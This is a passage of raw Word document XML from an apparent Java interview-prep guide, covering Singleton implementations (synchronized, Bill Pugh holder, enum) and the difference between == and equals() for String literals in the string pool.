          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AFE039" w14:textId="77777777"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ynchronize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Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getInstan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E39ABF8" w14:textId="77777777"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nstanc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5872AF4" w14:textId="77777777"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            instanc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Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D878EA8" w14:textId="77777777"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478AFD4" w14:textId="77777777"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instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE27F7" w14:textId="77777777"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94EC742" w14:textId="7DC9A2F2" w:rsidR="00557150" w:rsidRPr="00CE4B95"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4C8DE7E4" w14:textId="5965D980" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71BCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D94871F" w14:textId="77777777" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71BC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Best Practice: Bill Pugh Singleton (Thread-safe &amp; Lazy without synchronization overhead):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218CC7A2" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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Singlet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0D35836" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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Singlet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6EBD899" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E13C47" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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old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BD22957" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSTANC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Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3888B543" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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F9EB031" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DA345F" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getInstan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F1801FF" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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old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STANCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2711532E" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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EB0C062" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD1640A" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4540D6" w14:textId="77777777" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71BC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ingleton with Enum (Recommended for simplicity &amp; thread safety):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59396549" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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370152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num</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Singlet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9EF986F" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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3701526"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    INSTANCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B797EA" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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3701526"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BD1AF" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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370152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doSometh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CB81313" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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370152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ingleton doing work..."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC073FA" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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370152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E2E20E0" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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3701526"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB01029" w14:textId="77777777" w:rsidR="00783958" w:rsidRPr="00CE4B95"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3701526"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D50067" w14:textId="77777777" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71B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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BD5B2" w14:textId="6A6962F1" w:rsidR="00783958" w:rsidRPr="00CE4B95"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9565124"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MySinglet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STAN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oSomething</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30586594" w14:textId="77777777" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E71BC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83BA930">
          <v:rect id="_x0000_i1113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="732A668E" w14:textId="3676822D" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="0051148C" w:rsidP="00E9128D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc196307506"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Consider we have Strings as String s1 = “Welcome”, String s2 = “Welcome” and String s3 = “WelcomeOne”. What does s1==s2 represent</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="0AF93996" w14:textId="3610D6EE" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="00D36F18">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1 == s2 in Java compares references, not content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622DDF3" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0041174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3ED9D9C">
          <v:rect id="_x0000_i1114" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A97E6E" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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Given:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F9473" w14:textId="77777777" w:rsidR="00A1647D" w:rsidRPr="00CE4B95" w:rsidRDefault="00A164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7273986"/>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elcome"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529EAD55" w14:textId="77777777" w:rsidR="00A1647D" w:rsidRPr="00CE4B95" w:rsidRDefault="00A164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7273986"/>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elcome"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A9A8C" w14:textId="7D42C068" w:rsidR="00A1647D" w:rsidRPr="00CE4B95" w:rsidRDefault="00A164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7273986"/>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3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elcomeOn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59649DF1" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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s1 == s2 → true </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040BFB00" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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y? Because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8D74F" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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elcome" is a String literal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A58E744" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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 literals are stored in the String Pool (a part of the heap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FACCEF4" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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 optimizes memory by reusing string literals from the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038C49C6" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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o both s1 and s2 point to the same memory location in the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F6F052" w14:textId="0EE00D2F" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="176E46E5" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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hat about s1.equals(s2)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA26F24" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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checks content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8EC1DE" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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so returns true, because "Welcome".equals("Welcome").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B06359" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0041174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271E32">
          <v:rect id="_x0000_i1115" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0375C" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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 is false if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F3A7C" w14:textId="77777777" w:rsidR="0025695D" w:rsidRPr="00CE4B95" w:rsidRDefault="002569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2089171"/>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Welcome"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13238768" w14:textId="77777777" w:rsidR="0025695D" w:rsidRPr="00CE4B95" w:rsidRDefault="002569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2089171"/>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elcome"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550E6AE2" w14:textId="77777777" w:rsidR="0025695D" w:rsidRPr="00CE4B95" w:rsidRDefault="002569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2089171"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25275298" w14:textId="77777777" w:rsidR="0025695D" w:rsidRPr="00CE4B95" w:rsidRDefault="002569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2089171"/>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s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false (different memory locations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB50E21" w14:textId="205AFDE3" w:rsidR="0025695D" w:rsidRPr="00CE4B95" w:rsidRDefault="002569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2089171"/>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qual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rue  (same content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C4BC42" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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2"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="2521"/>
      </w:tblGrid>
      <w:tr w:rsidR="0041174E" w:rsidRPr="00CE4B95" w14:paraId="5EB6D8C6" w14:textId="77777777" w:rsidTr="0041174E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E76E7F2" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="00E81DFA">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parison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32AD230E" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="00E81DFA">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Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3726988B" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="00E81DFA">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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0041174E" w:rsidRPr="00CE4B95" w14:paraId="605AAF1E" w14:textId="77777777" w:rsidTr="0041174E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27A6FA53" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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1 == s2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BDE0630" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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ference equality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FA03695" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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true (same pool object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0041174E" w:rsidRPr="00CE4B95" w14:paraId="15A1B71B" w14:textId="77777777" w:rsidTr="0041174E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11FD0C8F" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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1.equals(s2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33D78AB0" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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tent equality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EF05960" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174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true (same content)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C849C83" w14:textId="3AF75049" w:rsidR="00A4403D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007854FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="66753ECE">
          <v:rect id="_x0000_i1116" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CBED9E" w14:textId="757D21BF" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00253194">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc196307507"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain String constant pool</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
